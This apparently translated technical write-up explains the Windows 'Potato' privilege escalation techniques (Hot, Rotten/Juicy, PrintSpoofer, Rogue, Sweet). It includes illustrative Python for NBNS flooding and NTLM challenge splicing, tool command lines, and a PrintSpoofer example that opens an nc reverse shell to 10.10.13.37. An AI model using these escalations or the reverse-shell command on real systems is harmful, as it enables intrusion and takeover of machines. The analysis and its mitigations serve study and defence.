Title: Analysis of the Potato Family of Privilege Escalation Techniques

Potato Family Privilege Escalation Analysis

1 Introduction

1.1 Logon accounts of Windows services

Local System - NT AUTHORITY\SYSTEM

Network Service - NT AUTHORITY\Network Service

Local Service - NT AUTHORITY\Local Service

Service accounts sit in an odd place in the Windows privilege model: they are not administrators, but by default they hold impersonation privileges that ordinary users do not. In a real engagement the code execution you first obtain usually runs as such an account, for example a webshell running as the IIS application pool identity or as Apache, or xp_cmdshell reached through SQL injection. Those contexts are low-privileged for most purposes, but the Potato techniques turn exactly that service-account privilege into NT AUTHORITY\SYSTEM.

1.2 Prerequisites

The prerequisite for every Potato variant except Hot Potato is that the current token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (check with whoami /priv). By default Windows grants them as follows:

SeImpersonatePrivilege: members of the local Administrators group (only in an elevated token; a UAC-filtered token of an ordinary Administrators member does not carry it, while the built-in Administrator account is not filtered by default), LOCAL SERVICE, NETWORK SERVICE, and the SERVICE group, i.e. services started by the Service Control Manager

SeAssignPrimaryTokenPrivilege: LOCAL SERVICE and NETWORK SERVICE (SYSTEM of course has both)

PS: During local testing, even after SeImpersonatePrivilege was granted to an ordinary member of the Administrators group in local policy, whoami /priv in cmd.exe did not show the privilege and it could not be used, whereas SeAssignPrimaryTokenPrivilege granted to an ordinary user showed up normally.

1.3 Windows Token

A Windows token is the kernel object that describes a security context: the user, its groups, and its privileges. One is created at logon and is then inherited (copied) by every new process and thread the logged-on user creates. Privileges can be present but disabled; a process must enable a privilege before using it.

With SeImpersonatePrivilege a process can call CreateProcessWithTokenW to start a new process under another token it has obtained (an impersonation token is acceptable here).

With SeAssignPrimaryTokenPrivilege (together with SeIncreaseQuotaPrivilege) a process can call CreateProcessAsUserW, which requires a primary token; an impersonation token must first be converted with DuplicateTokenEx.

For details, please refer to the article "Windows Access Token Attack".

2 Hot Potato

2.1 Overview

In January 2016 Stephen Breen of FoxGlove Security published Hot Potato, a local privilege escalation based on NTLM reflection. It combines NBNS spoofing with an HTTP-to-SMB NTLM relay to go from the lowest-privileged user on a host to NT AUTHORITY\SYSTEM; unlike the later Potatoes it does not depend on impersonation privileges.

2.2 NBNS

2.2.1 Concept

NBNS (NetBIOS Name Service) is a name-lookup service used widely on Windows. It runs over UDP port 137 and resolves names by broadcasting on the local subnet, so it only works between hosts on the same LAN.

It plays the same role for NetBIOS names that DNS plays in TCP/IP: given a name, find the IP address that owns it. Microsoft's WINS service is a server-based implementation of the NBNS protocol.

2.2.2 NBNS spoofing

Windows resolves a name in this order:

The local hosts file

DNS (the local resolver cache first, then the configured DNS server)

NBNS

NBNS works by broadcasting "who is xxx?" to every host on the subnet; whichever host answers "I am xxx" is believed.

During internal penetration tests attackers routinely listen for NBNS broadcasts and answer for the names they want to hijack; that is NBNS spoofing. (ARP spoofing is the equivalent trick one layer down, at the MAC level.)

Each NBNS packet carries a 16-bit transaction ID (TXID) that must match between request and response. In a privilege escalation scenario the attacker is an unprivileged local user and cannot sniff the outgoing request to learn the TXID (a raw socket needs administrator rights), so Hot Potato simply floods responses for all 65536 possible values.

If the name resolves through DNS, NBNS is never consulted. Hot Potato gets around this with UDP port exhaustion: it binds every UDP source port so the resolver's DNS query fails immediately, and Windows falls back to NBNS.
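As an added illustration (not part of the original post or of the Tater/Potato tools), the following Python builds and parses the NBNS packets described above and shows why the TXID forces the flood: the NetBIOS name encoding, a constructed query for WPAD, a positive response pointing WPAD at 127.0.0.1, and a generator that emits one response per possible transaction ID, of which the receiver accepts exactly one. The packet layout follows RFC 1002; the sample transaction ID and the 165-second TTL are arbitrary choices.

```python
import struct

# RFC 1002 constants used by the NetBIOS Name Service (UDP/137)
NB_RR_TYPE = 0x0020               # NB resource record
NB_CLASS_IN = 0x0001
FLAGS_QUERY = 0x0110              # query, recursion desired, broadcast
FLAGS_POSITIVE_RESPONSE = 0x8500  # response, authoritative answer, recursion desired
WORKSTATION_SUFFIX = 0x00         # 16th byte of the name: 0x00 = workstation service


def encode_netbios_name(name, suffix=WORKSTATION_SUFFIX):
    """First-level encoding: pad to 15 bytes, append the suffix byte, then split
    every byte into two nibbles and map each nibble onto 'A'..'P'."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 characters")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def _wire_name(name, suffix):
    # label length (0x20 = 32) + encoded name + root label terminator
    return b"\x20" + encode_netbios_name(name, suffix).encode("ascii") + b"\x00"


def build_nbns_query(txid, name, suffix=WORKSTATION_SUFFIX):
    """The broadcast a Windows host sends once hosts file and DNS have failed."""
    header = struct.pack(">HHHHHH", txid, FLAGS_QUERY, 1, 0, 0, 0)
    return header + _wire_name(name, suffix) + struct.pack(">HH", NB_RR_TYPE, NB_CLASS_IN)


def parse_nbns_query(pkt):
    """Returns (txid, name, suffix) for a name query request."""
    txid, flags, qdcount = struct.unpack_from(">HHH", pkt, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a name query request")
    if pkt[12] != 0x20:
        raise ValueError("unexpected label length")
    name, suffix = decode_netbios_name(pkt[13:45].decode("ascii"))
    return txid, name, suffix


def build_nbns_response(txid, name, ip, suffix=WORKSTATION_SUFFIX, ttl=165):
    """Positive name query response claiming that `name` lives at `ip`.
    The host only accepts it if txid matches its outstanding request."""
    header = struct.pack(">HHHHHH", txid, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    nb_flags = 0x0000  # B-node, unique name
    rdata = struct.pack(">H", nb_flags) + bytes(int(o) for o in ip.split("."))
    rr = (_wire_name(name, suffix)
          + struct.pack(">HHIH", NB_RR_TYPE, NB_CLASS_IN, ttl, len(rdata)) + rdata)
    return header + rr


def response_matches(query, response):
    """The receiver's check: it must be a response and the 16-bit TXID must match."""
    is_response = struct.unpack_from(">H", response, 2)[0] & 0x8000
    return bool(is_response) and query[:2] == response[:2]


def flood_responses(name, ip, suffix=WORKSTATION_SUFFIX):
    """Hot Potato cannot sniff the request from a low-privileged context,
    so it sends a response for every possible transaction ID."""
    for txid in range(0x10000):
        yield build_nbns_response(txid, name, ip, suffix)


if __name__ == "__main__":
    query = build_nbns_query(0x1234, "WPAD")  # constructed sample request
    print("WPAD encodes as", encode_netbios_name("WPAD"))
    hits = sum(1 for r in flood_responses("WPAD", "127.0.0.1") if response_matches(query, r))
    print("responses accepted out of 65536:", hits)
```

The flood is cheap for the attacker because the receiver does the filtering: 65535 of the forged responses are dropped on the TXID mismatch and the one that matches is cached as the answer for WPAD.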

2.3 WPAD proxy

Windows (Internet Explorer and anything using WinINET/WinHTTP proxy auto-detection) looks for its proxy settings by requesting http://wpad/wpad.dat.

A WPAD host does not necessarily exist on a network: even where a DNS server is present, nobody registers the name wpad unless the organisation wants to push proxy configuration automatically through a script.

So when neither the hosts file nor DNS can resolve wpad, the system falls back to NBNS. The attacker answers that NBNS query with their own address and runs an HTTP server that serves http://wpad/wpad.dat with a configuration pointing every request at a proxy they control.


Hot Potato binds its HTTP server on 127.0.0.1 and spoofs WPAD to that address, so every WPAD lookup on the machine is answered by the local proxy. Name resolution is a system-wide function: an NBNS response forged by a low-privileged user is believed by every process on the host, including those running as the local administrator and as SYSTEM, and all of their WPAD-driven HTTP traffic now flows through the attacker's proxy.

2.4 HTTP - SMB NTLM Relay


NTLM authentication has weak protection against man-in-the-middle attacks. Earlier reflection attacks against NTLM targeted SMB to SMB: the victim's SMB authentication was relayed back to its own host to obtain remote code execution.

Microsoft fixed SMB-to-SMB reflection in MS08-068, but the cross-protocol variant, relaying an HTTP authentication to SMB on the same host, still worked when Hot Potato was published.

2.5 Attack flow

Hot Potato chains these pieces to escalate:

NBNS spoofing of the name WPAD (with UDP port exhaustion to force the fallback to NBNS)

A local HTTP server that answers the WPAD request with a proxy configuration pointing at itself

HTTP-to-SMB NTLM relay: when a high-privileged process sends a request through the proxy, the proxy demands NTLM authentication and relays it to the local SMB service, gaining command execution as SYSTEM

Waiting for a high-privileged process to make such a request, for instance by triggering a Windows Update or Defender update check, which a low-privileged user can start

https://github.com/Kevin-Robertson/Tater

Import-Module .\Tater.ps1
Invoke-Tater -Command 'command to execute'


Tool address: https://github.com/foxglovesec/Potato

Windows 7: abuse the Windows Defender definition update mechanism

Potato.exe -ip <local ip> -cmd [cmd to run] -disable_exhaust true

Windows Server 2008: abuse the Windows Update mechanism; -spoof_host must be the WPAD FQDN that the update client actually resolves (the example below uses the test domain from the tool's README)

Potato.exe -ip <local ip> -cmd [cmd to run] -disable_exhaust true -disable_defender true -spoof_host WPAD.EMC.LOCAL

Windows Server 2012 R2: abuse the automatic daily download of the Certificate Trust List (CTL)

Potato.exe -ip <local ip> -cmd [cmd to run] -disable_exhaust true -disable_defender true

Mitigation:

Enforce SMB signing, which breaks the relay to the local SMB service. Microsoft addressed the underlying NTLM reflection in MS16-075, so patched systems are not affected. Disabling proxy auto-detection or registering a real wpad DNS entry also removes the NBNS fallback the attack depends on.

3 Rotten Potato / Juicy Potato

3.1 Principle

These two differ from the original Hot Potato: instead of waiting for a WPAD lookup, they use a DCOM activation to make a SYSTEM service connect to a port the attacker listens on and authenticate with NTLM, which is then relayed locally.

Rotten Potato and Juicy Potato rest on the same principle; the latter is a refinement of the former (more COM classes, any listening port, choice of process-creation API).

A few things to understand:

Some COM servers run as SYSTEM, BITS being the classic example. When such a server is activated through DCOM with an OBJREF that points at an attacker-chosen OXID resolver, the service itself makes the outbound connection, so the authentication it performs carries SYSTEM's identity.

The binding information in the OBJREF lets the attacker direct that connection to a TCP port of their choosing on the local machine, where the NTLM authentication can be captured and relayed.

LOCAL SERVICE and NETWORK SERVICE hold SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege by default; IIS application pool identities typically carry SeImpersonatePrivilege as well.

With SeImpersonatePrivilege enabled, the captured token can be passed to CreateProcessWithTokenW to create a new process.

With SeAssignPrimaryTokenPrivilege enabled, the captured token (converted to a primary token) can be passed to CreateProcessAsUser to create a new process.

3.2 Implementation flow

Trigger a DCOM activation of a COM class that runs as SYSTEM, with an OBJREF pointing at the attacker's ip:port. RottenPotatoNG uses BITS, CLSID {4991d34b-80a1-4291-83b6-3328366b9097}; the class is not unique and Juicy Potato ships many alternatives, listed at:

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

The attacker's listener answers and the SYSTEM client begins NTLM authentication by sending a type 1 (NEGOTIATE) message. The attacker cannot complete this exchange on their own: they are not SYSTEM and hold none of its secrets.

Two things happen with that type 1 at once. It is forwarded to the real local RPC endpoint, so the DCOM conversation stays valid (RottenPotatoNG forwards to port 135; Juicy Potato lets you pick any local port, but RPC almost always sits on 135 and is rarely moved). It is also fed to AcceptSecurityContext in the attacker's own process, an ordinary local NTLM negotiation that the current user is allowed to perform, which is why this side can succeed.

The two exchanges are then spliced together, which is the relay: the type 2 (CHALLENGE) message returned by port 135 has its server challenge replaced with the challenge that the local AcceptSecurityContext issued, and is sent on to the SYSTEM client. The SYSTEM client computes its type 3 (AUTHENTICATE) response against that challenge, the attacker hands the type 3 to AcceptSecurityContext, the local authentication completes, and the attacker obtains an impersonation token for SYSTEM. If the server challenge is not corrected, the type 3 is computed over the wrong nonce and the local authentication fails.

Finally a process is created with the SYSTEM token:

If SeImpersonatePrivilege is enabled, call CreateProcessWithTokenW with the SYSTEM token; the child runs as SYSTEM.

or

If SeAssignPrimaryTokenPrivilege is enabled, convert the token to a primary token with DuplicateTokenEx and call CreateProcessAsUser; the child runs as SYSTEM.
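To make the challenge-correction step concrete, here is an added Python example (not code from RottenPotato or JuicyPotato) that builds and parses an NTLM CHALLENGE_MESSAGE per MS-NLMP and patches the 8-byte ServerChallenge at offset 24, which is what the relay must do before forwarding the type 2 to the SYSTEM client. The target name WIN-SRV, the domain WORKGROUP, the version numbers and the challenge bytes are constructed sample values. A real relay also has to keep TargetInfo and any other field the local authenticator checks consistent with what the client sees; that part is outside this example.

```python
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE = 1, 2, 3

# NegotiateFlags bits (MS-NLMP 2.2.2.5)
NEGOTIATE_UNICODE = 0x00000001
REQUEST_TARGET = 0x00000004
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
TARGET_TYPE_SERVER = 0x00020000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000
NEGOTIATE_128 = 0x20000000
NEGOTIATE_56 = 0x80000000
DEFAULT_FLAGS = (NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM | NEGOTIATE_ALWAYS_SIGN
                 | TARGET_TYPE_SERVER | NEGOTIATE_EXTENDED_SESSIONSECURITY
                 | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION | NEGOTIATE_128 | NEGOTIATE_56)

# AV_PAIR ids used inside TargetInfo (MS-NLMP 2.2.2.1)
MSV_AV_EOL, MSV_AV_NB_COMPUTER_NAME, MSV_AV_NB_DOMAIN_NAME = 0, 1, 2

CHALLENGE_OFFSET = 24  # ServerChallenge occupies bytes 24..31 of every CHALLENGE_MESSAGE


def build_target_info(pairs):
    """TargetInfo blob: sequence of (AvId, AvLen, value) terminated by MsvAvEOL."""
    out = b""
    for av_id, value in pairs:
        v = value.encode("utf-16-le")
        out += struct.pack("<HH", av_id, len(v)) + v
    return out + struct.pack("<HH", MSV_AV_EOL, 0)


def parse_target_info(blob):
    pairs, pos = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            return pairs
        pairs[av_id] = blob[pos:pos + av_len].decode("utf-16-le")
        pos += av_len


def build_challenge(target_name, server_challenge, target_info, flags=DEFAULT_FLAGS):
    """Constructed type 2 message; the fixed part including Version is 56 bytes."""
    if len(server_challenge) != 8:
        raise ValueError("ServerChallenge is 8 bytes")
    name = target_name.encode("utf-16-le")
    name_off = 56
    ti_off = name_off + len(name)
    msg = NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(name), len(name), name_off)               # TargetNameFields
    msg += struct.pack("<I", flags)                                           # NegotiateFlags
    msg += server_challenge                                                   # ServerChallenge
    msg += b"\x00" * 8                                                        # Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info), ti_off)   # TargetInfoFields
    msg += struct.pack("<BBH3sB", 10, 0, 19041, b"\x00\x00\x00", 0x0F)      # Version (sample values)
    return msg + name + target_info


def parse_challenge(msg):
    if msg[:8] != NTLMSSP_SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != CHALLENGE_MESSAGE:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)
    return {
        "flags": flags,
        "server_challenge": msg[CHALLENGE_OFFSET:CHALLENGE_OFFSET + 8],
        "target_name": msg[tn_off:tn_off + tn_len].decode("utf-16-le"),
        "target_info": msg[ti_off:ti_off + ti_len],
    }


def replace_server_challenge(msg, new_challenge):
    """Patch the 8-byte ServerChallenge in place; every other byte is kept."""
    parse_challenge(msg)  # validates the message first
    if len(new_challenge) != 8:
        raise ValueError("ServerChallenge is 8 bytes")
    return msg[:CHALLENGE_OFFSET] + new_challenge + msg[CHALLENGE_OFFSET + 8:]


def splice_for_local_accept(type2_from_rpc, type2_from_accept):
    """What the man-in-the-middle forwards to the SYSTEM client: the type 2 from the
    real RPC server, carrying the challenge our local AcceptSecurityContext issued,
    so that the client's type 3 verifies against our local context."""
    local_challenge = parse_challenge(type2_from_accept)["server_challenge"]
    return replace_server_challenge(type2_from_rpc, local_challenge)


if __name__ == "__main__":
    ti = build_target_info([(MSV_AV_NB_COMPUTER_NAME, "WIN-SRV"), (MSV_AV_NB_DOMAIN_NAME, "WORKGROUP")])
    from_rpc = build_challenge("WIN-SRV", b"\x01" * 8, ti)       # sample: challenge from port 135
    from_accept = build_challenge("WIN-SRV", b"\x02" * 8, ti)    # sample: challenge from AcceptSecurityContext
    print(parse_challenge(splice_for_local_accept(from_rpc, from_accept))["server_challenge"].hex())
```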

3.3 In practice

Tool address: https://github.com/ohpe/juicy-potato

3.3.1 Initial access

A webshell running as iis apppool\defaultapppool.


3.3.2 Choose a usable CLSID for the operating system

Reference list:

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

For example, on the Server 2012 test system the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} was chosen.

To find a working class on an unfamiliar build, test the candidates one by one with the batch script from the repository, which calls juicypotato.exe once per CLSID:

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

The batch script works as-is and needs no modification.

3.3.3 Privilege escalation

Upload a Cobalt Strike payload, or prepare a listener for a reverse interactive shell, then launch it through JuicyPotato. juicypotato.exe takes the CLSID with -c, the program to run with -p (its arguments with -a), the local port to listen on with -l, and -t selects the process-creation API: t for CreateProcessWithTokenW, u for CreateProcessAsUser, * to try both.

4 PrintSpoofer (PipePotato or BadPotato)

4.1 Principle

Named pipe impersonation: a named pipe server can call ImpersonateNamedPipeClient (RPC servers have RpcImpersonateClient, and ImpersonateLoggedOnUser does the same given a token) to take on the security context of whichever client connected. The call changes the security context of the calling thread; impersonating above identification level requires SeImpersonatePrivilege. PrintSpoofer exploits a path-validation bug in the Print Spooler so that a SYSTEM service connects to a named pipe the attacker created, after which the attacker's thread impersonates SYSTEM.

The spoolsv.exe service exposes an RPC interface (MS-RPRN) with the following function:

DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
    /* [in] */ PRINTER_HANDLE hPrinter,
    /* [in] */ DWORD fdwFlags,
    /* [in] */ DWORD fdwOptions,
    /* [unique][string][in] */ wchar_t *pszLocalMachine,
    /* [in] */ DWORD dwPrinterLocal,
    /* [unique][in] */ RPC_V2_NOTIFY_OPTIONS *pOptions);

pszLocalMachine must be a UNC server name. With \\127.0.0.1 the spooler connects back to \\127.0.0.1\pipe\spoolss, a pipe already owned by the system. Passing \\127.0.0.1\pipe\foo is rejected by the path check, which refuses a backslash inside the server name.

With \\127.0.0.1/pipe/foo, however, the check treats 127.0.0.1/pipe/foo as a single host name and lets it through. When the spooler then opens the pipe, the path is canonicalised and / becomes \, so it connects to \\127.0.0.1\pipe\foo\pipe\spoolss. The attacker creates a named pipe with that name in advance and steals the client's token when SYSTEM connects. The PrintSpoofer PoC starts its new process with CreateProcessAsUser rather than CreateProcessWithToken.
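The check-then-canonicalise ordering described above, modelled in Python as an added example (this is not spoolsv.exe's code; the function names, the placeholder pipe name foo and the 127.0.0.1 host are assumptions). It shows which server names pass the validation, where the spooler ends up connecting, which local pipe the attacker must create, and a hardened variant that canonicalises before validating so the bypass no longer works.

```python
SPOOLSS_PIPE = "\\pipe\\spoolss"


def check_server_name(server):
    """Validation as the text describes it: '\\\\' followed by a host name that
    contains no further backslash. Forward slashes are not considered."""
    if not server.startswith("\\\\"):
        return False
    host = server[2:]
    return bool(host) and "\\" not in host


def normalize(path):
    """Separator canonicalisation applied when the pipe is opened: '/' becomes '\\'."""
    return path.replace("/", "\\")


def spoolss_target(server):
    """Pipe the spooler (running as SYSTEM) connects back to, or None if the name
    is rejected. Validation runs on the raw input and normalisation afterwards;
    that ordering is the bug."""
    if not check_server_name(server):
        return None
    return normalize(server) + SPOOLSS_PIPE


def local_pipe_name(unc_pipe_path):
    """'\\\\host\\pipe\\X' as the local named-pipe file system sees it: '\\\\.\\pipe\\X'."""
    host, _, rest = unc_pipe_path[2:].partition("\\")
    if not rest.lower().startswith("pipe\\"):
        raise ValueError("not a pipe path: %r" % unc_pipe_path)
    return "\\\\.\\pipe\\" + rest[len("pipe\\"):]


def attacker_pipe_for(placeholder, host="127.0.0.1"):
    """Server name to pass as pszLocalMachine, and the pipe the attacker must
    create locally beforehand so that the spooler lands on it."""
    server = "\\\\%s/pipe/%s" % (host, placeholder)
    local_pipe = "\\\\.\\pipe\\%s%s" % (placeholder, SPOOLSS_PIPE)
    return server, local_pipe


def check_server_name_fixed(server):
    """Hardened variant: canonicalise first, then validate the canonical form."""
    return check_server_name(normalize(server))


def spoolss_target_fixed(server):
    if not check_server_name_fixed(server):
        return None
    return normalize(server) + SPOOLSS_PIPE


if __name__ == "__main__":
    for candidate in ("\\\\127.0.0.1", "\\\\127.0.0.1\\pipe\\foo", "\\\\127.0.0.1/pipe/foo"):
        print("%-28s vulnerable -> %-40s fixed -> %s"
              % (candidate, spoolss_target(candidate), spoolss_target_fixed(candidate)))
    server, pipe = attacker_pipe_for("foo")
    print("pass %s, create %s" % (server, pipe))
```

The general lesson is the usual one for path checks: validate the form the consumer will actually use, which means canonicalising first, or reject any separator the check does not understand.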

4.2 In practice

Tool address: https://github.com/itm4n/PrintSpoofer


4.2.1 Spawn an interactive SYSTEM shell

Used when you already have an interactive shell:

C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening.
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

4.2.2 Spawn a SYSTEM process

Used with non-interactive shells that can still run commands: launch a Cobalt Strike payload, or use nc to send back a high-privileged reverse shell:

C:\TOOLS>PrintSpoofer.exe -c 'C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd'
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening.
[+] CreateProcessAsUser() OK

4.2.3 Spawn a SYSTEM process on a desktop session

When logged on locally or over RDP, first run qwinsta to find the current session ID, then pass it with -d so the new process is spawned on that desktop:

C:\TOOLS>PrintSpoofer.exe -d 3 -c 'powershell -ep bypass'
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening.
[+] CreateProcessAsUser() OK

5 RoguePotato

5.1 Principle

RoguePotato also ends in named pipe impersonation.

Since Microsoft's fix (Windows 10 1809 and Server 2019 onwards) the DCOM resolver ignores any port given in the OBJREF's DUALSTRINGARRAY and always connects to port 135, which is what broke Juicy Potato. To get around this, the author sends the OXID resolution to a remote host under the attacker's control, which forwards port 135 back to a chosen port on the victim where a rogue RPC OXID resolver runs. That resolver answers with a binding to a named pipe on the victim, so the SYSTEM service connects to the attacker's pipe and its token can be impersonated. This is why the tool needs a remote redirector (-r) and, optionally, a local resolver port (-l).

5.2 In practice

Tool address: https://github.com/antonioCoco/RoguePotato

Mandatory args:
-r remote_ip: ip of the remote machine to use as redirector
-e commandline: commandline of the program to launch
Optional args:
-l listening_port: This will run the RogueOxidResolver locally on the specified port
-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)
-z : this flag will randomize the pipename_placeholder (don't use with -p)


6 SweetPotato

6.1 Principle

A combined implementation of the COM (Rotten/Juicy), WinRM and Spoolsv (PrintSpoofer) techniques, i.e. Juicy Potato and PrintSpoofer in one tool with a selectable trigger.

6.2 In practice

Tool address: https://github.com/CCob/SweetPotato

References:

https://foxglovesecurity.com/2016/01/16/hot-potato/

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://xz.aliyun.com/t/7776/#toc-4

https://3gstudent.github.io/3gstudent.github.io/Windows local authority elevation tool Juicy-Potato test analysis/

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-rogue
